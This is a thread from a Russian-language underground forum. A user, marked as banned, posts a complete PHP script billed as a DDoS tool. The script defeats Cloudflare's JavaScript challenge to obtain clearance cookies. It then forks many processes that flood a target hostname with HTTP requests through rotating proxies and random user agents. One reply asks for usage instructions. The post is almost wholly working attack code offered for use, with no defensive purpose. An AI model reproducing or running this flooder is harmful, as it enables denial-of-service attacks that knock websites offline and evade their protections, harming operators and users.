Актуально DDos скрипт [php] cfbypass new

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

lolik228

Участник

lolik228

Участник
2 Фев 2017
448
101
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
PHP:
<?php
    /**
     * CF Bypass
     *
     * @author sizzuz
     * @copyright Copyright &copy; sizzuz
     *
     */

    //ini_set('display_errors', 1);
    //error_reporting(E_ALL);
    
    function do_curl($url, $useragent = '', $proxy = '', $header = false, $nobody = false, $followlocation = false, $cookie = '', $timeout = 30)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, !!$followlocation);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_ENCODING, '');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        if ($header) curl_setopt($ch, CURLOPT_HEADER, true);
        if ($nobody) curl_setopt($ch, CURLOPT_NOBODY, true);
        if (strlen($useragent) > 0) curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        if (strlen($proxy) > 0) curl_setopt($ch, CURLOPT_PROXY, $proxy);
        if (strlen($cookie) > 0) curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        $result = curl_exec($ch);
        curl_close($ch);
        
        return $result;
    }
    
    function get_useragent()
    {
        //get random user agent
        $uas = array(    'Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
                        'Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
                        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36',
                        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36',
                        'Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54',
                        'Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0',
                        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
                        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
                        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36');
        return $uas[array_rand($uas)];
    }
    
    function get_proxy($filename, $line_length = 4096)
    {
        //get random line from file
        $random_line = '';
        if (file_exists($filename) && is_readable($filename))
        {
            //based on: http://stackoverflow.com/questions/12118995/how-to-echo-random-line-from-text-file
            $handle = fopen($filename, 'r');
            if ($handle)
            {
                $line = null;
                $count = 0;
                while (($line = fgets($handle, $line_length)) !== false)
                {
                    $count++;
                    if ((mt_rand() % $count) == 0)
                        $random_line = $line;
                }
                if (!feof($handle))    //unexpected fgets() fail
                    $random_line = '';
                fclose($handle);
            }
        }
        
        return trim($random_line);
    }
    
    function cfbypass($url, $useragent = '', $proxy = '')
    {
        $ret = array(    'success' => false,
                        'msg' => '',
                        'cookie' => array());
        
        $cookie = array();
        
        //get domain and scheme
        $url_parsed = parse_url($url);
        if (!is_array($url_parsed) || !isset($url_parsed['host']))
        {
            $ret['msg'] = 'cant determine domain';
            return $ret;
        }
        $url_domain = $url_parsed['host'];
        $url_scheme = (isset($url_parsed['scheme']) ? $url_parsed['scheme'] : 'http');
        
        //there is an issue with this method. if there is a '+' in the pass parameter, cloudflare does not give clearance (also tested with browser, it is a cloudflare issue)
        //so we have to take care to get a pass without a '+'
        $lc = 0;
        $get = true;
        do
        {
            //get head
            $cfuam = do_curl($url, $useragent, $proxy, true, true);
            
            //check, if this looks like CF UAM
            if (strpos($cfuam, 'cloudflare-nginx') === false || strpos($cfuam, 'chk_jschl') === false)
            {
                $ret['msg'] = 'no CF UAM';
                break;
            }
            
            //get CF cookie
            if (!preg_match('/^Set\-Cookie\: __cfduid\=([a-z0-9]+);/m', $cfuam, $matches_cfuid))
            {
                $ret['msg'] = 'cant find cookie __cfduid';
                break;
            }
            $cookie['__cfduid'] = '__cfduid='.$matches_cfuid[1];
            
            //get refresh URL
            if (!preg_match('/^Refresh\: (\d);URL\=(.+)$/m', $cfuam, $matches_refresh_url))
            {
                $ret['msg'] = 'cant find refresh url';
                break;
            }
            $refresh_url = $url_scheme.'://'.$url_domain.trim($matches_refresh_url[2]);
            //keep the check simple
            if (strpos($refresh_url, '+') === false)
                $get = false;
            
            $lc++;
            if ($lc > 10)
            {
                $ret['msg'] = 'lc hit limit';
                break;
            }
        } while ($get);
        if ($get)
            return $ret;
        
        //properly encode query string
        if (false !== $q = strpos($refresh_url, '?'))
        {
            $a = substr($refresh_url, 0, $q);
            $b = substr($refresh_url, ($q+1));
            parse_str($b, $b);
            $refresh_url = $a.'?'.http_build_query($b);
        }
        
        //wait
        usleep((($matches_refresh_url[1] * 1000000) + 100000));
        
        //try to get clearance
        $cfchk = do_curl($refresh_url, $useragent, $proxy, true, true, false, implode('; ', $cookie));
        if (!preg_match('/^Set\-Cookie\: cf_clearance\=(.+);/Um', $cfchk, $matches_cf_clearance))
        {
            $ret['msg'] = 'did not get clearance';
            return $ret;
        }
        $cookie['cf_clearance'] = 'cf_clearance='.$matches_cf_clearance[1];
        
        //return
        $ret = array(    'success' => true,
                        'msg' => 'successfully bypassed',
                        'cookie' => $cookie);
        return $ret;
    }
    
    echo PHP_EOL;
    echo 'CF Bypass by sizzuz'.PHP_EOL;
    echo 'Usage: <target hostname> <proxy file/nofile> <threads> <time>'.PHP_EOL;
    if (count($argv) < 5)
    {
        echo 'Error: Invalid parameters'.PHP_EOL;
        exit();
    }
    
    echo PHP_EOL;
    echo 'Starting flood on '.$argv[1].' for '.$argv[4].' seconds with '.$argv[3].' threads via proxies from file '.$argv[2].PHP_EOL;
    echo PHP_EOL;
    
    $cfbypass_debug = false;
    $url = $argv[1];
    $proxyfile = $argv[2];
    $threads = $argv[3];
    $expires = (time() + $argv[4]);
    
    for ($i = 1; $i <= $threads; $i++)
    {
        $pid = pcntl_fork();
        if ($pid == -1)
            echo 'Warning: Failed to fork thread '.$i.PHP_EOL;
        else if ($pid)
            continue;//pcntl_wait($status);
        else
        {
            echo 'OK: Started thread '.$i.'. Trying cf bypass...'.PHP_EOL;
            $useragent = get_useragent();
            $proxy = ($proxyfile == 'nofile' ? '' : get_proxy($proxyfile));
            if ($proxy == '' && $proxyfile != 'nofile')
                echo 'Warning: No proxy is set on thread '.$i.PHP_EOL;
                
            $cfbypass = cfbypass($url, $useragent, $proxy);
            if ($cfbypass_debug)
                print_r($cfbypass);
            if ($cfbypass['success'] === true)
            {
                echo 'OK: Thread '.$i.' CF bypassed. Starting flood...'.PHP_EOL;
                while ($expires >= time())
                {
                    //randomize user agent
                    $useragent = get_useragent();
                    $flood = do_curl($url, $useragent, $proxy, false, false, true, implode('; ', $cfbypass['cookie']), 15);
                }
            }
            else
            {
                echo 'Error: Thread '.$i.' CF not bypassed ('.$cfbypass['msg'].')'.PHP_EOL;
            }
            echo 'OK: Closing thread '.$i.PHP_EOL;
            exit();
        }
    }
?>
 

gtXER

Участник

gtXER

Участник
23 Фев 2017
58
41
+,хоть немного бы описания и инструкций
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя